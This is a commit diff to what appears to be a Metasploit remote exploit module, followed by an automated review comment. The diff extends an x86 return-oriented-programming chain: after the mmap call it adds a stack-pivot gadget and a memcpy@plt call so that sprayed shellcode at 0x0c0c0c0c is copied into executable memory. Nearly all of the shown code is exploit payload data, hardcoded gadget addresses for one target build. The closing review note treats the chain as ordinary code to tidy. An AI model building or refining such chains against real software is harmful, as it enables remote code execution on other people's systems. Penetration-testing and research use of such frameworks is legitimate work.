add memcpy to the ropchain due to the zeroed mmap function under ubuntu

unstable
agix 2013-04-01 14:13:19 +02:00
parent baf1ce22b3
commit 6b639ad2ee
1 changed files with 8 additions and 2 deletions


@ -34,13 +34,19 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'mmap' => [ 'mmap' => [
0x0816f768, #mmap_64@plt 0x0816f768, #mmap_64@plt
0x0c0c0c0c, #NOPSLED+SHELLCODE 0x8666d07, #add esp, 0x14 / pop ebx / pop ebp / ret
0x0c0c0000, 0x0c0c0000,
0x00010000, 0x00002000,
0x00000007, 0x00000007,
0x00000031, 0x00000031,
0xffffffff, 0xffffffff,
0x00000000, 0x00000000,
0x78696761,
0x0816e4c8, #memcpy@plt
0x0c0c0c0c,
0x0c0c0000,
0x0c0b0000,
0x00002000
], ],
'ret' => [0x08055a70], #ret 'ret' => [0x08055a70], #ret
'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c] 'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
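Review bot: The entries added to the 'mmap' array after `#memcpy@plt` have no comments, unlike the first entries, and `0x78696761` is an unexplained magic value (its bytes read as ASCII text, so it is presumably just a filler word; confirm). I would give each new entry a trailing comment and zero-pad the gadget address to match the other entries, `0x08666d07, #add esp, 0x14 / pop ebx / pop ebp / ret`. The key is still named 'mmap' although the array now also holds the memcpy call, so a one-line comment above it saying so would help the next reader. All of these are absolute addresses, so the table presumably matches only one fixed-address build of the target binary, and the entry should name that build; the target hash starts and ends outside this hunk.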